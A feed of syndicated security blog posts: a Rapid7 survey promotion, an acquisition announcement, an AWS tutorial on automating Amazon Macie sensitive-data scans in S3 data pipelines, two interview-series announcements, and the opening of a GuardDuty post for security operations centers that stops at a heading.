For their research, ESG surveyed hundreds of IT and cybersecurity professionals to gain more insights into strategies for driving successful security analytics and operations. Read the highlights of their study below, and check out the full ebook, “The Rise of Cloud-Based Security Analytics and Operations Technologies,” here.

The attack surface continues to grow as cloud adoption soars

Many organizations have been adopting cloud solutions, giving teams more visibility across their environments, while at the same time expanding their attack surface. The trend toward the cloud is only continuing to increase—ESG’s research found that 82% of organizations are dedicated to moving a significant amount of their workload and applications to the public cloud. The surge in remote work over the past year has arguably only amplified this, making it even more critical for teams to have detection and response programs that are more effective and efficient than ever before.

Organizations are looking toward consolidation to streamline incident detection and response

ESG found that 70% of organizations are using a SIEM tool today, along with an assortment of other point solutions, such as an EDR or Network Traffic Analysis solution. While this fixes the visibility issue plaguing security teams today, it doesn’t help with streamlining detection and response, which is likely why 36% of cybersecurity professionals say integrating disparate security analytics and operations tools is one of their organization’s highest priorities. Consolidating solutions drastically cuts down on false-positive alerts, eliminating the noise and confusion of managing multiple tools.

Combat complexity and drive efficiency with the right cloud solution

A detection and response solution that can correlate all of your valuable security data in one place is key for accelerated detection and response across the sprawling attack surface. Rapid7’s InsightIDR provides advanced visibility by automatically ingesting data from across your environment—including logs, endpoints, network traffic, cloud, and user activity—into a single solution, eliminating the need to jump in and out of multiple tools and giving hours back to your team. And with pre-built automation workflows, you can take action directly from within InsightIDR.

See ESG’s findings on cloud-based solutions, automation/orchestration, machine learning, and more by accessing “The Rise of Cloud-Based Security Analytics and Operations Technologies” ebook.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Rapid7 Acquires Leading Kubernetes Security Provider, Alcide

Post Syndicated from Brian Johnson original https://blog.rapid7.com/2021/02/01/rapid7-acquires-leading-kubernetes-security-provider-alcide/

Rapid7 Acquires Leading Kubernetes Security Provider, Alcide

Organizations around the globe continue to embrace the flexibility, speed, and agility of the cloud. Those that have adopted it are able to accelerate innovation and deliver real value to their customers faster than ever before. However, while the cloud can bring a tremendous amount of benefits to a company, it is not without its risks. Organizations need comprehensive visibility into their cloud and container environments to help mitigate risk, potential threats, and misconfigurations.

At Rapid7, we strive to help our customers establish and implement strategies that enable them to rapidly adopt and secure cloud environments. Looking only at cloud infrastructure or containers in a silo provides limited ability to understand the impact of a possible vulnerability or breach.

To help our customers gain a more comprehensive view of their cloud environments, I am happy to announce that we have acquired Alcide, a leader in Kubernetes security based in Tel Aviv, Israel. Alcide provides seamless Kubernetes security fully integrated into the DevOps lifecycle and processes so that business applications can be rapidly deployed while also protecting cloud environments from malicious attacks.

Alcide’s industry-leading cloud workload protection platform (CWPP) provides broad, real-time visibility and governance, container runtime and network monitoring, as well as the ability to detect, audit, and investigate known and unknown security threats. By bringing together Alcide’s CWPP capabilities with our existing posture management (CSPM) and infrastructure entitlements (CIEM) capabilities, we will be able to provide our customers with a cloud-native security platform that enables them to manage risk and compliance across their entire cloud environment.

This is an exciting time in cloud security, as we’re witnessing a shift in perception. Cloud security teams are no longer viewed as a cost center or operational roadblock and have earned their seat at the table as a critical investment essential to driving business forward. With Alcide, we’re excited to further increase that competitive advantage for our customers.

We look forward to joining forces with Alcide’s talented team as we work together to provide our customers comprehensive, unified visibility across their entire cloud infrastructure and cloud-native applications.

Welcome to the herd, Alcide!

Use Macie to discover sensitive data as part of automated data pipelines

Post Syndicated from Brandon Wu original https://aws.amazon.com/blogs/security/use-macie-to-discover-sensitive-data-as-part-of-automated-data-pipelines/

Data is a crucial part of every business and is used for strategic decision making at all levels of an organization. To extract value from their data more quickly, Amazon Web Services (AWS) customers are building automated data pipelines—from data ingestion to transformation and analytics. As part of this process, my customers often ask how to prevent sensitive data, such as personally identifiable information, from being ingested into data lakes when it’s not needed. They highlight that this challenge is compounded when ingesting unstructured data—such as files from process reporting, text files from chat transcripts, and emails. They also mention that identifying sensitive data inadvertently stored in structured data fields—such as in a comment field stored in a database—is also a challenge.

In this post, I show you how to integrate Amazon Macie as part of the data ingestion step in your data pipeline. This solution provides an additional checkpoint that sensitive data has been appropriately redacted or tokenized prior to ingestion. Macie is a fully managed data security and privacy service that uses machine learning and pattern matching to discover sensitive data in AWS.

When Macie discovers sensitive data, the solution notifies an administrator to review the data and decide whether to allow the data pipeline to continue ingesting the objects. If allowed, the objects will be tagged with an Amazon Simple Storage Service (Amazon S3) object tag to identify that sensitive data was found in the object before progressing to the next stage of the pipeline.

This combination of automation and manual review helps reduce the risk that sensitive data—such as personally identifiable information—will be ingested into a data lake. This solution can be extended to fit your use case and workflows. For example, you can define custom data identifiers as part of your scans, add additional validation steps, create Macie suppression rules to archive findings automatically, or only request manual approvals for findings that meet certain criteria (such as high severity findings).
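For example, adding a custom data identifier takes only a few lines of boto3; the name and regular expression below are hypothetical placeholders for an internal identifier format.

    import boto3

    macie = boto3.client("macie2")

    # Hypothetical pattern for an internal employee ID such as EMP-123456.
    response = macie.create_custom_data_identifier(
        name="internal-employee-id",
        description="Matches internal employee identifiers",
        regex=r"EMP-\d{6}",
    )
    print(response["customDataIdentifierId"])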

Solution overview

Many of my customers are building serverless data lakes with Amazon S3 as the primary data store. Their data pipelines commonly use different S3 buckets at each stage of the pipeline. I refer to the S3 bucket for the first stage of ingestion as the raw data bucket. A typical pipeline might have separate buckets for raw, curated, and processed data representing different stages as part of their data analytics pipeline.

Typically, customers will perform validation and clean their data before moving it to a raw data zone. This solution adds validation steps to that pipeline after preliminary quality checks and data cleaning is performed, noted in blue (in layer 3) of Figure 1. The layers outlined in the pipeline are:

  1. Ingestion – Brings data into the data lake.
  2. Storage – Provides durable, scalable, and secure components to store the data—typically using S3 buckets.
  3. Processing – Transforms data into a consumable state through data validation, cleanup, normalization, transformation, and enrichment. This processing layer is where the additional validation steps are added to identify instances of sensitive data that haven’t been appropriately redacted or tokenized prior to consumption.
  4. Consumption – Provides tools to gain insights from the data in the data lake.

 

Figure 1: Data pipeline with sensitive data scan

The application runs on a scheduled basis (four times a day, every 6 hours by default) to process data that is added to the raw data S3 bucket. You can customize the application to perform a sensitive data discovery scan during any stage of the pipeline. Because most customers do their extract, transform, and load (ETL) daily, the application scans for sensitive data on a scheduled basis before any crawler jobs run to catalog the data and after typical validation and data redaction or tokenization processes complete.

You can expect that this additional validation will add 5–10 minutes to your pipeline execution at a minimum. The validation processing time will scale linearly based on object size, but there is a start-up time per job that is constant.

If sensitive data is found in the objects, an email is sent to the designated administrator requesting an approval decision, which they indicate by selecting the link corresponding to their decision to approve or deny the next step. In most cases, the reviewer will choose to adjust the sensitive data cleanup processes to remove the sensitive data, deny the progression of the files, and re-ingest the files in the pipeline.

Additional considerations for deploying this application for regular use are discussed at the end of the blog post.

Application components

The application creates several resources, including S3 buckets for each pipeline stage, Lambda functions, a Step Functions workflow, an EventBridge scheduled rule, an SNS topic, and an API Gateway endpoint; these are described in the Application logic section that follows.

Note: The application uses various AWS services, and there are costs associated with these resources after the Free Tier usage. See AWS Pricing for details. The primary drivers of the solution cost will be the amount of data ingested through the pipeline, both for Amazon S3 storage and for data processed for sensitive data discovery with Macie.

The architecture of the application is shown in Figure 2 and described in the text that follows.
 

Figure 2: Application architecture and logic

Application logic

  1. Objects are uploaded to the raw data S3 bucket as part of the data ingestion process.
  2. A scheduled EventBridge rule runs the sensitive data scan Step Functions workflow.
  3. triggerMacieScan Lambda function moves objects from the raw data S3 bucket to the scan stage S3 bucket.
  4. triggerMacieScan Lambda function creates a Macie sensitive data discovery job on the scan stage S3 bucket.
  5. checkMacieStatus Lambda function checks the status of the Macie sensitive data discovery job (a simplified sketch of steps 4 and 5 appears after this list).
  6. isMacieStatusCompleteChoice Step Functions Choice state checks whether the Macie sensitive data discovery job is complete.
    1. If yes, the getMacieFindingsCount Lambda function runs.
    2. If no, the Step Functions Wait state waits 60 seconds and then restarts Step 5.
  7. getMacieFindingsCount Lambda function counts all of the findings from the Macie sensitive data discovery job.
  8. isSensitiveDataFound Step Functions Choice state checks whether sensitive data was found in the Macie sensitive data discovery job.
    1. If there was sensitive data discovered, run the triggerManualApproval Lambda function.
    2. If there was no sensitive data discovered, run the moveAllScanStageS3Files Lambda function.
  9. moveAllScanStageS3Files Lambda function moves all of the objects from the scan stage S3 bucket to the scanned data S3 bucket.
  10. triggerManualApproval Lambda function tags and moves objects with sensitive data discovered to the manual review S3 bucket, and moves objects with no sensitive data discovered to the scanned data S3 bucket. The function then sends a notification to the ApprovalRequestNotification Amazon SNS topic as a notification that manual review is required.
  11. Email is sent to the email address that’s subscribed to the ApprovalRequestNotification Amazon SNS topic (from the application deployment template) for the manual review user with the option to Approve or Deny pipeline ingestion for these objects.
  12. Manual review user assesses the objects with sensitive data in the manual review S3 bucket and selects the Approve or Deny links in the email.
  13. The decision request is sent from the Amazon API Gateway to the receiveApprovalDecision Lambda function.
  14. manualApprovalChoice Step Functions Choice state checks the decision from the manual review user.
    1. If denied, run the deleteManualReviewS3Files Lambda function.
    2. If approved, run the moveToScannedDataS3Files Lambda function.
  15. deleteManualReviewS3Files Lambda function deletes the objects from the manual review S3 bucket.
  16. moveToScannedDataS3Files Lambda function moves the objects from the manual review S3 bucket to the scanned data S3 bucket.
  17. The next step of the automated data pipeline will begin with the objects in the scanned data S3 bucket.
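Steps 4 and 5 can be approximated with a few Macie API calls. The boto3 sketch below creates a one-time sensitive data discovery job on the scan stage bucket and polls for completion; the account ID and bucket name are placeholders, and the deployed solution performs the waiting in a Step Functions Wait state rather than inside a Lambda function.

    import time
    import boto3

    macie = boto3.client("macie2")

    # Placeholders: substitute your account ID and scan stage bucket name.
    job = macie.create_classification_job(
        jobType="ONE_TIME",
        name="data-pipeline-scan-example",
        s3JobDefinition={
            "bucketDefinitions": [{
                "accountId": "111122223333",
                "buckets": ["example-prefix-data-pipeline-scan-stage"],
            }]
        },
    )

    # Poll until the discovery job finishes.
    while True:
        status = macie.describe_classification_job(jobId=job["jobId"])["jobStatus"]
        if status in ("COMPLETE", "CANCELLED", "USER_PAUSED"):
            break
        time.sleep(60)
    print(status)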

Prerequisites

For this application, you need the AWS CLI and the AWS SAM CLI available in your development environment, along with an AWS account where Amazon Macie is enabled or can be enabled during deployment.

You can use AWS Cloud9 to deploy the application. AWS Cloud9 includes the AWS CLI and AWS SAM CLI to simplify setting up your development environment.

Deploy the application with AWS SAM CLI

You can deploy this application using the AWS SAM CLI. AWS SAM uses AWS CloudFormation as the underlying deployment mechanism. AWS SAM is an open-source framework that you can use to build serverless applications on AWS.

To deploy the application

  1. Initialize the serverless application using the AWS SAM CLI from the GitHub project in the aws-samples repository. This will clone the project locally, which includes the source code for the Lambda functions, the Step Functions state machine definition file, and the AWS SAM template. On the command line, run the following:
    sam init --location gh:aws-samples/amazonmacie-datapipeline-scan
    

    Alternatively, you can clone the Github project directly.

  2. Deploy your application to your AWS account. On the command line, run the following:
    sam deploy --guided
    

    Complete the prompts during the guided interactive deployment. The first deployment prompt is shown in the following example.

    Configuring SAM deploy
    ======================
    
            Looking for config file [samconfig.toml] :  Found
            Reading default arguments  :  Success
    
            Setting default arguments for 'sam deploy'
            =========================================
            Stack Name [maciepipelinescan]:
    

  3. Settings:
    • Stack Name – Name of the CloudFormation stack to be created.
    • AWS Region – The Region—for example, us-west-2, eu-west-1, ap-southeast-1—to deploy the application to. This application was tested in the us-west-2 and ap-southeast-1 Regions. Before selecting a Region, verify that the services you need are available in those Regions (for example, Macie and Step Functions).
    • Parameter StepFunctionName – Name of the Step Functions state machine to be created—for example, maciepipelinescanstatemachine.
    • Parameter BucketNamePrefix – Prefix to apply to the S3 buckets to be created (S3 bucket names are globally unique, so choosing a random prefix helps ensure uniqueness).
    • Parameter ApprovalEmailDestination – Email address to receive the manual review notification.
    • Parameter EnableMacie – Whether you need Macie enabled in your account or Region. Select yes if you need Macie to be enabled for you as part of this template; select no if you already have Macie enabled.
  4. Confirm changes and provide approval for AWS SAM CLI to deploy the resources to your AWS account by responding y to prompts, as shown in the following example. You can accept the defaults for the SAM configuration file and SAM configuration environment prompts.
    #Shows you resources changes to be deployed and require a 'Y' to initiate deploy
    Confirm changes before deploy [y/N]: y
    #SAM needs permission to be able to create roles to connect to the resources in your template
    Allow SAM CLI IAM role creation [Y/n]: y
    ReceiveApprovalDecisionAPI may not have authorization defined, Is this okay? [y/N]: y
    ReceiveApprovalDecisionAPI may not have authorization defined, Is this okay? [y/N]: y
    Save arguments to configuration file [Y/n]: y
    SAM configuration file [samconfig.toml]: 
    SAM configuration environment [default]:
    

    Note: This application deploys an Amazon API Gateway with two REST API resources without authorization defined to receive the decision from the manual review step. You will be prompted to accept each resource without authorization. A token (Step Functions taskToken) is used to authenticate the requests.

  5. This creates an AWS CloudFormation changeset. Once the changeset creation is complete, you must provide a final confirmation of y to Deploy the changeset? [y/N] when prompted as shown in the following example.
    Changeset created successfully. arn:aws:cloudformation:ap-southeast-1:XXXXXXXXXXXX:changeSet/samcli-deploy1605213119/db681961-3635-4305-b1c7-dcc754c7XXXX
    
    
    Previewing CloudFormation changeset before deployment
    ======================================================
    Deploy this changeset? [y/N]:
    

Your application is deployed to your account using AWS CloudFormation. You can track the deployment events in the command prompt or via the AWS CloudFormation console.

After the application deployment is complete, you must confirm the subscription to the Amazon SNS topic. An email will be sent to the email address entered in Step 3 with a link that you need to select to confirm the subscription. This confirmation provides opt-in consent for AWS to send emails to you via the specified Amazon SNS topic. The emails will be notifications of potentially sensitive data that need to be approved. If you don’t see the verification email, be sure to check your spam folder.

Test the application

The application uses an EventBridge scheduled rule to start the sensitive data scan workflow, which runs every 6 hours. You can manually start an execution of the workflow to verify that it’s working. To test the function, you will need a file that contains data that matches your rules for sensitive data. For example, it is easy to create a spreadsheet, document, or text file that contains names, addresses, and numbers formatted like credit card numbers. You can also use this generated sample data to test Macie.

We will test by uploading a file to our S3 bucket via the AWS web console. If you know how to copy objects from the command line, that also works.

Upload test objects to the S3 bucket

  1. Navigate to the Amazon S3 console and upload one or more test objects to the <BucketNamePrefix>-data-pipeline-raw bucket. <BucketNamePrefix> is the prefix you entered when deploying the application in the AWS SAM CLI prompts. You can use any objects as long as they’re a supported file type for Amazon Macie. I suggest uploading multiple objects, some with and some without sensitive data, in order to see how the workflow processes each.
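If you’d rather upload the test objects from code than the console, a minimal boto3 sketch follows; the bucket name and file names are placeholders that should match your deployment and local files.

    import boto3

    s3 = boto3.client("s3")

    # Placeholders: use your actual bucket prefix and local test files.
    bucket = "example-prefix-data-pipeline-raw"
    for filename in ["sample-with-sensitive-data.csv", "sample-clean.txt"]:
        s3.upload_file(Filename=filename, Bucket=bucket, Key=f"test/{filename}")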

Start the Scan State Machine

  1. Navigate to the Step Functions state machines console. If you don’t see your state machine, make sure you’re connected to the same region that you deployed your application to.
  2. Choose the state machine you created using the AWS SAM CLI as seen in Figure 3. The example state machine is maciepipelinescanstatemachine, but you might have used a different name in your deployment.
     
    Figure 3: AWS Step Functions state machines console

  3. Select the Start execution button and copy the value from the Enter an execution name – optional box. Change the Input – optional value, replacing <execution id> with the value you just copied, as follows:
    {
        "id": "<execution id>"
    }
    

    In my example, the <execution id> is fa985a4f-866b-b58b-d91b-8a47d068aa0c from the Enter an execution name – optional box as shown in Figure 4. You can choose a different ID value if you prefer. This ID is used by the workflow to tag the objects being processed to ensure that only objects that are scanned continue through the pipeline. When the EventBridge scheduled event starts the workflow as scheduled, an ID is included in the input to the Step Functions workflow. Then select Start execution again. (You can also start the execution programmatically; see the sketch after this list.)
     

    Figure 4: New execution dialog box

  4. You can see the status of your workflow execution in the Graph inspector as shown in Figure 5. In the figure, the workflow is at the pollForCompletionWait step.
     
    Figure 5: AWS Step Functions graph inspector
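For completeness, here is a minimal boto3 sketch of starting the same execution from code; the state machine ARN is a placeholder to copy from the console, and the id value is arbitrary, as described in step 3.

    import json
    import uuid
    import boto3

    sfn = boto3.client("stepfunctions")

    # Placeholder ARN: copy the real one from the Step Functions console.
    state_machine_arn = (
        "arn:aws:states:us-west-2:111122223333:"
        "stateMachine:maciepipelinescanstatemachine"
    )

    response = sfn.start_execution(
        stateMachineArn=state_machine_arn,
        input=json.dumps({"id": str(uuid.uuid4())}),  # used to tag processed objects
    )
    print(response["executionArn"])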

The sensitive data discovery job should run for about five to ten minutes. The jobs scale linearly based on object size, but there is a start-up time per job that is constant. If sensitive data is found in the objects uploaded to the <BucketNamePrefix>-data-pipeline-upload S3 bucket, an email is sent to the address provided during the AWS SAM deployment step, notifying the recipient that an approval decision is needed; they indicate their decision by selecting the link corresponding to approve or deny for the next step, as shown in Figure 6.
 

Figure 6: Sensitive data identified email

When you receive this notification, you can investigate the findings by reviewing the objects in the <BucketNamePrefix>-data-pipeline-manual-review S3 bucket. Based on your review, you can either apply remediation steps to remove any sensitive data or allow the data to proceed to the next step of the data ingestion pipeline. You should define a standard response process to address discovery of sensitive data in the data pipeline. Common remediation steps include review of the files for sensitive data, deleting the files that you do not want to progress, and updating the ETL process to redact or tokenize sensitive data when re-ingesting into the pipeline. When you re-ingest the files into the pipeline without sensitive data, the files will not be flagged by Macie.

The workflow performs the following:

  • If you select Approve, the files are moved to the <BucketNamePrefix>-data-pipeline-scanned-data S3 bucket with an Amazon S3 SensitiveDataFound object tag with a value of true.
  • If you select Deny, the files are deleted from the <BucketNamePrefix>-data-pipeline-manual-review S3 bucket.
  • If no action is taken, the Step Functions workflow execution times out after five days and the file will automatically be deleted from the <BucketNamePrefix>-data-pipeline-manual-review S3 bucket after 10 days.

Clean up the application

You’ve successfully deployed and tested the sensitive data pipeline scan workflow. To avoid ongoing charges for resources you created, you should delete all associated resources by deleting the CloudFormation stack. In order to delete the CloudFormation stack, you must first delete all objects that are stored in the S3 buckets that you created for the application.

To delete the application

  1. Empty the S3 buckets created in this application (<BucketNamePrefix>-data-pipeline-raw S3 bucket, <BucketNamePrefix>-data-pipeline-scan-stage, <BucketNamePrefix>-data-pipeline-manual-review, and <BucketNamePrefix>-data-pipeline-scanned-data).
  2. Delete the CloudFormation stack used to deploy the application.

Considerations for regular use

Before using this application in a production data pipeline, you will need to stop and consider some practical matters. First, the notification mechanism used when sensitive data is identified in the objects is email. Email doesn’t scale: you should expand this solution to integrate with your ticketing or workflow management system. If you choose to use email, subscribe a mailing list so that the work of reviewing and responding to alerts is shared across a team.

Second, the application runs on a schedule (every 6 hours by default). You should consider starting the application once your preliminary validations have completed and the data is ready for a sensitive data scan as part of your pipeline. You can modify the EventBridge rule to run in response to an Amazon EventBridge event instead of on a schedule.
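For instance, the schedule on the rule could be adjusted with a few lines of boto3; the rule name here is hypothetical, and an event-driven variant would pass EventPattern instead of ScheduleExpression.

    import boto3

    events = boto3.client("events")

    # Hypothetical rule name; mirrors the default cadence of every 6 hours.
    events.put_rule(
        Name="data-pipeline-sensitive-data-scan",
        ScheduleExpression="rate(6 hours)",
        State="ENABLED",
    )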

Third, the application currently uses a 60 second Step Functions Wait state when polling for the Macie discovery job completion. In real world scenarios, the discovery scan will take 10 minutes at a minimum, likely several orders of magnitude longer. You should evaluate the typical execution times for your application execution and tune the polling period accordingly. This will help reduce costs related to running Lambda functions and log storage within CloudWatch Logs. The polling period is defined in the Step Functions state machine definition file (macie_pipeline_scan.asl.json) under the pollForCompletionWait state.

Fourth, the application currently doesn’t account for false positives in the sensitive data discovery job results. Also, the application will progress or delete all objects identified based on the decision by the reviewer. You should consider expanding the application to handle false positives through automation rather than manual review / intervention (such as deleting the files from the manual review bucket or removing the sensitive data tags applied).

Last, the solution will stop the ingestion of a subset of objects into your pipeline. This behavior is similar to other validation and data quality checks that most customers perform as part of the data pipeline. However, you should test to ensure that this will not cause unexpected outcomes and address them in your downstream application logic accordingly.

Conclusion

In this post, I showed you how to integrate sensitive data discovery using Macie as an additional validation step in an automated data pipeline. You’ve reviewed the components of the application, deployed it using the AWS SAM CLI, tested to validate that the application functions as expected, and cleaned up by removing deployed resources.

You now know how to integrate sensitive data scanning into your ETL pipeline. You can use automation and—where required—manual review to help reduce the risk of sensitive data, such as personally identifiable information, being inadvertently ingested into a data lake. You can take this application and customize it to fit your use case and workflows, such as using custom data identifiers as part of your scans, adding additional validation steps, creating Macie suppression rules to define cases to archive findings automatically, or only request manual approvals for findings that meet certain criteria (such as high severity findings).

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the Amazon Macie forum.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Brandon Wu

Brandon is a security solutions architect helping financial services organizations secure their critical workloads on AWS. In his spare time, he enjoys exploring outdoors and experimenting in the kitchen.

Verified, episode 2 – A Conversation with Emma Smith, Director of Global Cyber Security at Vodafone

Post Syndicated from Stephen Schmidt original https://aws.amazon.com/blogs/security/verified-episode-2-conversation-with-emma-smith-director-of-global-cyber-security-at-vodafone/

Over the past 8 months, it’s become more important for us all to stay in contact with peers around the globe. Today, I’m proud to bring you the second episode of our new video series, Verified: Presented by AWS re:Inforce. Even though we couldn’t be together this year at re:Inforce, our annual security conference, we still wanted to share some of the conversations with security leaders that would have taken place at the conference. The series showcases conversations with security leaders around the globe. In episode two, I’m talking to Emma Smith, Vodafone’s Global Cyber Security Director.

Vodafone is a global technology communications company with an optimistic culture. Their focus is connecting people and building the digital future for society. During our conversation, Emma detailed how the core values of the Global Cyber Security team were inspired by the company. “We’ve got a team of people who are ultimately passionate about protecting customers, protecting society, protecting Vodafone, protecting all of our services and our employees.” Emma shared experiences about the evolution of the security organization during her past 5 years with the company.

We were also able to touch on one of Emma’s passions, diversity and inclusion. Emma has worked to implement diversity and drive a policy of inclusion at Vodafone. In June, she was named Diversity Champion in the SC Awards Europe. In her own words: “It makes me realize that my job is to smooth the way for everybody else and to try and remove some of those obstacles or barriers that were put in their way… it means that I’m really passionate about trying to get a very diverse team in security, but also in Vodafone, so that we reflect our customer base, so that we’ve got diversity of thinking, of backgrounds, of experience, and people who genuinely feel comfortable being themselves at work—which is easy to say but really hard to create that culture of safety and belonging.”

Stay tuned for future episodes of Verified: Presented by AWS re:Inforce here on the AWS Security Blog. You can watch episode one, an interview with Jason Chan, Vice President of Information Security at Netflix on YouTube. If you have an idea or a topic you’d like covered in this series, please drop us a comment below.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Steve Schmidt

Steve is Vice President and Chief Information Security Officer for AWS. His duties include leading product design, management, and engineering development efforts focused on bringing the competitive, economic, and security benefits of cloud computing to business and government customers. Prior to AWS, he had an extensive career at the Federal Bureau of Investigation, where he served as a senior executive and section chief. He currently holds 11 patents in the field of cloud security architecture. Follow Steve on Twitter.

Introducing the first video in our new series, Verified, featuring Netflix’s Jason Chan

Post Syndicated from Stephen Schmidt original https://aws.amazon.com/blogs/security/introducing-first-video-new-series-verified-featuring-netflix-jason-chan/

The year has been a profoundly different one for us all, and like many of you, I’ve been adjusting, both professionally and personally, to this “new normal.” Here at AWS we’ve seen an increase in customers looking for secure solutions to maintain productivity in an increased work-from-home world. We’ve also seen an uptick in requests for training; it’s clear, a sense of community and learning are critically important as workforces physically distance.

For these reasons, I’m happy to announce the launch of Verified: Presented by AWS re:Inforce. I’m hosting this series, but I’ll be joined by leaders in cloud security across a variety of industries. The goal is to have an open conversation about the common issues we face in securing our systems and tools. Topics will include how the pandemic is impacting cloud security, tips for creating an effective security program from the ground up, how to create a culture of security, emerging security trends, and more. Learn more by following me on Twitter (@StephenSchmidt), and get regular updates from @AWSSecurityInfo. Verified is just one of the many ways we will continue sharing best practices with our customers during this time. You can find more by reading the AWS Security Blog, reviewing our documentation, visiting the AWS Security and Compliance webpages, watching re:Invent and re:Inforce playlists, and/or reviewing the Security Pillar of Well Architected.

Our first conversation, above, is with Jason Chan, Vice President of Information Security at Netflix. Jason spoke to us about the security program at Netflix, his approach to hiring security talent, and how Zero Trust enables a remote workforce. Jason also has solid insights to share about how he started and grew the security program at Netflix.

“In the early days, what we were really trying to figure out is how do we build a large-scale consumer video-streaming service in the public cloud, and how do you do that in a secure way? There wasn’t a ton of expertise in that, so when I was building the security team at Netflix, I thought, ‘how do we bring in folks from a variety of backgrounds, generalists … to tackle this problem?’”

He also gave his view on how a growing security team can measure ROI. “I think it’s difficult to have a pure equation around that. So what we try to spend our time doing is really making sure that we, as a team, are aligned on what is the most important—what are the most important assets to protect, what are the most critical risks that we’re trying to prevent—and then make sure that leadership is aligned with that, because, as we all know, there’s not unlimited resources, right? You can’t hire an unlimited number of folks or spend an unlimited amount of money, so you’re always trying to figure out how do you prioritize, and how do you find where is going to be the biggest impact for your value?”

Check out Jason’s full interview above, and stay tuned for further videos in this series. If you have an idea or a topic you’d like covered in this series, please drop us a comment below. Thanks!

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Steve Schmidt

Steve is Vice President and Chief Information Security Officer for AWS. His duties include leading product design, management, and engineering development efforts focused on bringing the competitive, economic, and security benefits of cloud computing to business and government customers. Prior to AWS, he had an extensive career at the Federal Bureau of Investigation, where he served as a senior executive and section chief. He currently holds 11 patents in the field of cloud security architecture. Follow Steve on Twitter.

How Security Operation Centers can use Amazon GuardDuty to detect malicious behavior

Post Syndicated from Darren House original https://aws.amazon.com/blogs/security/how-security-operation-centers-can-use-amazon-guardduty-to-detect-malicious-behavior/

The Security Operations Center (SOC) has a tough job. As customers modernize and shift to cloud architectures, monitoring, detecting, and responding to risks presents a different set of challenges.

In this post, we discuss how Amazon GuardDuty can address some common SOC concerns about the number of security tools and the overhead of integrating and managing them. We describe the GuardDuty service; how the SOC can use GuardDuty threat lists, filtering, and suppression rules to tune detections and reduce noise; and the intentional model used to define and categorize GuardDuty finding types so that they quickly convey detailed information about detections.

Today, the typical SOC has between 10 and 60 tools for managing security. Some larger SOCs can have more than 100 tools, which are mostly point solutions that don’t integrate with each other.

The security market is flush with niche security tools you can deploy to monitor, detect, and respond to events. Each tool has technical and operational overhead in the form of designing for system uptime, sensor deployment, data aggregation, tool integration, deployment plans, server and software maintenance, and licensing.

Tuning your detection systems is an example of a process with both technical and operational overhead. To improve your signal-to-noise ratio (S/N), the security systems you deploy have to be tuned to your environment and to emerging risks that are relevant to your environment. Improving the S/N matters for SOC teams because it reduces time and effort spent on activities that don’t bring value to an organization. Spending time tuning detection systems reduces the exhaustion factors that impact your SOC analysts. Tuning is highly technical, yet it’s also operational because it’s a process that continues to evolve, which means you need to manage the operations and maintenance lifecycle of the infrastructure and tools that you use in tuning your detections.

Amazon GuardDuty

GuardDuty is a core part of the modern FedRAMP-authorized cloud SOC, because it provides SOC analysts with a broad range of cloud-specific detective capabilities without requiring the overhead associated with a large number of security tools.

GuardDuty is a continuous security monitoring service that analyzes and processes data from Amazon Virtual Private Cloud (VPC) Flow Logs, AWS CloudTrail event logs that record Amazon Web Services (AWS) API calls, and DNS logs to provide analysis and detection using threat intelligence feeds, signatures, anomaly detection, and machine learning in the AWS Cloud. GuardDuty also helps you to protect your data stored in S3. GuardDuty continuously monitors and profiles S3 data access events (usually referred to as data plane operations) and S3 configurations (control plane APIs) to detect suspicious activities. Detections include unusual geo-location, disabling of preventative controls such as S3 block public access, or API call patterns consistent with an attempt to discover misconfigured bucket permissions. For a full list of GuardDuty S3 threat detections, see GuardDuty S3 finding types. GuardDuty integrates threat intelligence feeds from CrowdStrike, Proofpoint, and AWS Security to detect network and API activity from known malicious IP addresses and domains. It uses machine learning to identify unknown and potentially unauthorized and malicious activity within your AWS environment.

The GuardDuty team continually monitors and manages the tuning of detections for threats related to modern cloud deployments, but your SOC can use trusted IP and threat lists and suppression rules to implement your own custom tuning to fit your unique environment.

GuardDuty is integrated with AWS Organizations, and customers can use AWS Organizations to associate member accounts with a GuardDuty management account. AWS Organizations helps automate the process of enabling and disabling GuardDuty simultaneously across a group of AWS accounts that are in your control. Note that, as of this writing, you can have one management account and up to 5,000 member accounts.
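
If you prefer to script that association, the following boto3 sketch is one minimal way to do it. The Region and account ID are placeholders, it assumes GuardDuty is already enabled in the delegated administrator account, and the organization auto-enable options continue to evolve, so verify the parameters against the current GuardDuty API reference.

import boto3
REGION = "us-east-1"                  # placeholder Region
SECURITY_ACCOUNT_ID = "111122223333"  # placeholder delegated administrator account
# Step 1: run with credentials for the AWS Organizations management account
# to designate the GuardDuty delegated administrator (often a security account).
org_mgmt = boto3.client("guardduty", region_name=REGION)
org_mgmt.enable_organization_admin_account(AdminAccountId=SECURITY_ACCOUNT_ID)
# Step 2: run with credentials for the delegated administrator account
# (assumes GuardDuty is already enabled there) to auto-enable GuardDuty
# for accounts that join the organization later.
delegated_admin = boto3.client("guardduty", region_name=REGION)
detector_id = delegated_admin.list_detectors()["DetectorIds"][0]
delegated_admin.update_organization_configuration(DetectorId=detector_id, AutoEnable=True)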

Operational overhead is near zero. There are no agents or sensors to deploy or manage. There are no servers to build, deploy, or manage. There’s nothing to patch or upgrade. There aren’t any highly available architectures to build. You don’t have to buy a subscription to a threat intelligence provider or manage the influx of threat data, and most importantly, you don’t have to invest in normalizing all of the datasets to facilitate correlation. Your SOC can enable GuardDuty with a single click or API call. It is a multi-account service: you can designate a management account, typically the security account, that can read all findings information from the member accounts for easy centralization of detections. When deployed in a Management/Member design, GuardDuty provides a flexible model for centralizing your enterprise threat detection capability. The management account can control certain member settings, like update intervals for Amazon CloudWatch Events, use of threat and trusted lists, creation of suppression rules, opening tickets, and automating remediations.
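
As a minimal illustration of that single API call, the boto3 sketch below enables GuardDuty in one account and Region; the Region and the finding publishing frequency are assumptions you can change.

import boto3
guardduty = boto3.client("guardduty", region_name="us-east-1")  # placeholder Region
# Enabling GuardDuty is a single call per account and Region; the detector ID
# it returns is what later filter and suppression-rule calls operate on.
response = guardduty.create_detector(
    Enable=True,
    FindingPublishingFrequency="FIFTEEN_MINUTES",  # optional; SIX_HOURS is the service default
)
print("Detector ID:", response["DetectorId"])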

Filters and suppression rules

